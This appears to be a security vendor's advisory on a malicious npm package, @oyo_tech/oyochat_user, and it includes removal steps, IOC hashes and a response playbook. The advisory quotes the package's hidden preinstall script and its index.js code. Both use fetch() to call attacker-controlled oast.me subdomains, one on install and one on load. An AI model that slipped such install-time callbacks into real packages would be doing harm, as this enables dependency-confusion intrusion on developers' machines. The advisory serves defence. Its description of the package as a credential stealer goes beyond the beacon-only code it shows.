Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

@oyo_tech/oyochat_usernpm

@oyo_tech/oyochat_user is a confirmed malicious npm package (MAL-2026-14123) that steals credentials and exfiltrates sensitive data (malicious versions 99.99.99, 100.0.0). Do not install it — remove it immediately and rotate any exposed credentials.

Malicious code in @oyo_tech/oyochat_user (npm)

MAL-2026-14123
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall @oyo_tech/oyochat_user

What this malware does

@oyo_tech/[email protected] is a dependency-confusion probe. package.json declares a preinstall script that runs node -e "fetch('https://dc.installed.da24gtar47nuepat1pu053x3cgyweiaom.oast.me/'+process.env.npm_package_name)", causing npm install to make an outbound callback to an attacker-controlled interactsh (oast.me) subdomain and disclose that the package resolved on the installer's host. index.js additionally issues fetch("https://dc.executed.da24gtar47nuepat1pu053x3cgyweiaom.oast.me/oyochat_user") on require/import, signalling that the package was actually loaded by a build. Distinct installed. and executed. subdomains under the same attacker-controlled OAST token are used to stage install-vs-execute telemetry. The 99.99.99 version and scoped org name are consistent with a dependency-confusion attack targeting an internal package name. Installing this package confirms code execution on the installer's host to the attacker and exposes the internal package name; the same install-time execution primitive can be trivially upgraded to arbitrary payload delivery.

The OpenSSF Package Analysis project identified '@oyo_tech/oyochat_user' @ 100.0.0 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.

Malicious versions

2 flagged
99.99.99100.0.0

Indicators of compromise (SHA-256)

db0f726175ab94e18345e8926ec8de1f76a684ac09429303323c3ceb0d14aea4
146298f68340821e8518528fc76b215c8c962f360f0efaf586931894941cce89
2211869e361bf0cd90956a5c1dae972927c25c1d52e5ed4729cddc7b67fe682e

Detection & response playbook

Credential / info stealer
  1. Find it

    Search your lockfiles and build artifacts for @oyo_tech/oyochat_user (2 malicious versions).

  2. If you installed it — respond

    @oyo_tech/oyochat_user is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

  3. Did it already run?

    If @oyo_tech/oyochat_user was installed, its post-install payload may already have run. Removing the package does not undo that — check outbound connections and credential use from the install window onward.

Frequently asked questions

No. @oyo_tech/oyochat_user on npm has been identified as a malicious package (versions 99.99.99, 100.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-017988IN-MAL-2026-018171

References

Credits

  • Amazon Inspector · finder
  • OpenSSF: Package Analysis · finder

Detect & block this

O3 blocks @oyo_tech/oyochat_user-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.

Explore

@oyo_tech/oyochat_user (npm) malicious package — MAL-2026-14123 | O3 Security